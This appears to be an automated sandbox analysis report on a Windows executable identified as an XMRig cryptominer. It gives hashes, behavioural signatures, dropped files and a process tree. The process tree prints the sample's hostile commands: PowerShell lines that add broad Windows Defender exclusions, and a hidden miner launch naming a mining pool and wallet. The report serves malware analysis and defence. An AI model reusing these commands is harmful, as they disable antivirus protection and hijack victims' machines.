Analysis

  • max time kernel
    43s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    24-01-2025 23:09

General

  • Target

    Fatality.exe

  • Size

    2.1MB

  • MD5

    ab637a979ba3f9e64730d0d64bf55dc7

  • SHA1

    2701c106d3b66aa75852f82dfadef0c791e7bc87

  • SHA256

    f43db369e0af2af2f1b0abb8da9963e79f21c724b65d2a59db67ca5e4379fb19

  • SHA512

    120c9af2442d107d38bde79f80445bff0862e7dde6aa8c3388f0a69061588b0baee10e4ac9cfffcdb25728823e388bc6487e2fe447c758e4dd22d4168c8b7165

  • SSDEEP

    49152:r6yNBEGdFePFvVY09GPY9YuQHz/ITi4Na:r6yv/dcbY6YzQi4Na

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 17 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Fatality.exe
    "C:\Users\Admin\AppData\Local\Temp\Fatality.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Windows\system32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1328
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1180
    • C:\Windows\System32\cmd.exe
      C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10343 --user=455nttL43xofRvzTCtQ7ZX1KrU2NA26Fvci3pLMPaWzR1oD2N1nX --pass= --cpu-max-threads-hint=10 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=30 --tls --cinit-stealth
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2812
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2888
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68e9758,0x7fef68e9768,0x7fef68e9778
      2⤵
        PID:2992
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1164 --field-trial-handle=1204,i,4830188160180096890,672031953341772096,131072 /prefetch:2
        2⤵
          PID:320
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1204,i,4830188160180096890,672031953341772096,131072 /prefetch:8
          2⤵
            PID:1004
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1204,i,4830188160180096890,672031953341772096,131072 /prefetch:8
            2⤵
              PID:1476
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2284 --field-trial-handle=1204,i,4830188160180096890,672031953341772096,131072 /prefetch:1
              2⤵
                PID:1492
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1204,i,4830188160180096890,672031953341772096,131072 /prefetch:1
                2⤵
                  PID:2076
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1472 --field-trial-handle=1204,i,4830188160180096890,672031953341772096,131072 /prefetch:2
                  2⤵
                    PID:712
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2832 --field-trial-handle=1204,i,4830188160180096890,672031953341772096,131072 /prefetch:1
                    2⤵
                      PID:2036
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3728 --field-trial-handle=1204,i,4830188160180096890,672031953341772096,131072 /prefetch:8
                      2⤵
                        PID:2388
                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                      1⤵
                        PID:3024

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                        Filesize

                        633B

                        MD5

                        927fe8345bcbe05a5293eaee4ad55974

                        SHA1

                        fc97649c3553db16fd797b2a4e1ac6901cadd956

                        SHA256

                        b5a8c26ec23ebae05fb759f322d413be48613240bada637dc0e4047d256cb3aa

                        SHA512

                        e96d468b92935abcabd9830367979ce384238c030c35ff32bb6e728e08f284ee80950e785310fc1690ff43f2323a742b416bcaa7991240d0f142bab1d7aaae4f

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                        Filesize

                        4KB

                        MD5

                        9e5ee47714d9cdd7b466d345989703e6

                        SHA1

                        bd2455a80e774428d27a68a0c9b899eb06a5c0a7

                        SHA256

                        ccdda0ad90f1c195beebda5a1d947ce03ec08a5a8bd0dd4202464442517238b9

                        SHA512

                        8c38605a3a704b8f06753025229de54e1ebe3463b9fdf777a476ab1d8217f31028f027e9d2f287168931003f5a73b78a200b7a25558f74a1823ac31fa7aacc46

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                        Filesize

                        4KB

                        MD5

                        0f65a8bc7cdb02a36e12cb798b476655

                        SHA1

                        03d5a156bc04e1cead2c941f543109385142fe8f

                        SHA256

                        9742c63345c7375ef971e2065ffb97b93d417e4bf660513e6b50b3a9a42fb41d

                        SHA512

                        07c02ac4943d6cb1b244a5a087af2d9baba1cf14da372578afcddd100318a6edc4c7d553901a7d4f72bdf78f37a97654b5dc3a6cc68965f13e04452572cfc3b8

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                        Filesize

                        4KB

                        MD5

                        5fe81c89208df55f364d14111b6177a0

                        SHA1

                        3aa748ca44f61dd985d865cb0783e98fc67ebd59

                        SHA256

                        1681a739f98605eb890b866778810f076e50c5cf7b95c1a0374321261908401d

                        SHA512

                        d007440fa92c3e4969c27b2f44b0bfc83dd93f9a8af13b18375e7267ee05132214995dad586605d24b62069807a52fd06a3513ef01108d2b48fa3e368e460947

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                        Filesize

                        4KB

                        MD5

                        7b632d2b30422f9af6ab2988fc4bfd4e

                        SHA1

                        fc34c8b0d1f9bffb80dd6ba18ef583bfee9c64a6

                        SHA256

                        38df762c3d0859e3e9ab9ca3bcf0d5fefaccb57fdff5f2aa5490da152cdb4add

                        SHA512

                        4b4ea92517a26d95279e4b983d9823606d9c8bb0a1e8e02ea5e08735d15267b3ad9ca509592beb8ab0d82b146a8bfe1a550aeb3fd75e236ce6737291d26437c5

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

                        Filesize

                        16B

                        MD5

                        18e723571b00fb1694a3bad6c78e4054

                        SHA1

                        afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                        SHA256

                        8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                        SHA512

                        43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                        Filesize

                        333KB

                        MD5

                        9f73b4a9aa26999e4facb616217b2aa4

                        SHA1

                        d3730ea72cf8b7d2c899e82e757adaef07d8b63c

                        SHA256

                        e8a80c1fec676d98581e385d328d1baf0716d6a3d68078ef16d3561910505f0e

                        SHA512

                        e4232bfce70077d4ef8b9d793e0f645739cd074657d2c5b3e27db697e799a6072cdeed7787b42243ba274f6232fc7b2202c980e3b12e0ac0dfbaea101efb9577

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

                        Filesize

                        264KB

                        MD5

                        f50f89a0a91564d0b8a211f8921aa7de

                        SHA1

                        112403a17dd69d5b9018b8cede023cb3b54eab7d

                        SHA256

                        b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                        SHA512

                        bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\aa0298c0-8560-4658-8e72-4ecad30818a9.tmp

                        Filesize

                        333KB

                        MD5

                        8e538c2cf613f3ed5f07dc4b7b85a1c9

                        SHA1

                        1a59f497c96047a9cb03e34c98f52f04cbcc1b2f

                        SHA256

                        4155f54bff9d64d341a00a5009edbc0c74ab7137958914d3dd4f44a4987462d3

                        SHA512

                        0a640732a139d9aa1bbd0c4017acc9cac8e6bf826d9131b9536eda574255e794f2681706d07f1933de488cfa84e551119498088cf228ba31f424efc695065a95

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                        Filesize

                        7KB

                        MD5

                        95486447371c7aaaa9cd1d75a1d75137

                        SHA1

                        e8b728e214509431dd85aafe9d8eab559d29482f

                        SHA256

                        91289c08a8ac2c8c52d77c0e5e721ab883f690c1c11daec9c5a3c174096bd609

                        SHA512

                        63dec4ce09d7f2b2979f00d192d166efa9533c60f60fe6d05ee9e3d571f08e376bc9c938d697023c4369fb8ae8da2200da34fd9690e2d21b603e3d36ae8cea62

                      • memory/1064-9-0x000007FEF5400000-0x000007FEF5DEC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/1064-0-0x000007FEF5403000-0x000007FEF5404000-memory.dmp

                        Filesize

                        4KB

                      • memory/1064-43-0x000007FEF5400000-0x000007FEF5DEC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/1064-1-0x000000013F600000-0x000000013F818000-memory.dmp

                        Filesize

                        2.1MB

                      • memory/1180-50-0x00000000027A0000-0x00000000027A8000-memory.dmp

                        Filesize

                        32KB

                      • memory/1180-49-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

                        Filesize

                        2.9MB

                      • memory/2104-11-0x000007FEEEB8E000-0x000007FEEEB8F000-memory.dmp

                        Filesize

                        4KB

                      • memory/2104-37-0x0000000002E6B000-0x0000000002ED2000-memory.dmp

                        Filesize

                        412KB

                      • memory/2104-42-0x000007FEEE8D0000-0x000007FEEF26D000-memory.dmp

                        Filesize

                        9.6MB

                      • memory/2104-57-0x000007FEEE8D0000-0x000007FEEF26D000-memory.dmp

                        Filesize

                        9.6MB

                      • memory/2104-10-0x0000000002E60000-0x0000000002EE0000-memory.dmp

                        Filesize

                        512KB

                      • memory/2104-8-0x0000000002680000-0x0000000002688000-memory.dmp

                        Filesize

                        32KB

                      • memory/2104-7-0x000000001B7A0000-0x000000001BA82000-memory.dmp

                        Filesize

                        2.9MB

                      • memory/2104-36-0x0000000002E64000-0x0000000002E67000-memory.dmp

                        Filesize

                        12KB

                      • memory/2812-39-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-26-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-22-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-25-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-18-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-16-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-14-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-12-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-55-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-54-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-56-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-30-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-51-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-52-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-53-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-38-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

                        Filesize

                        4KB

                      • memory/2812-41-0x00000000001E0000-0x0000000000200000-memory.dmp

                        Filesize

                        128KB

                      • memory/2812-40-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-32-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-34-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-28-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB

                      • memory/2812-20-0x0000000140000000-0x0000000140786000-memory.dmp

                        Filesize

                        7.5MB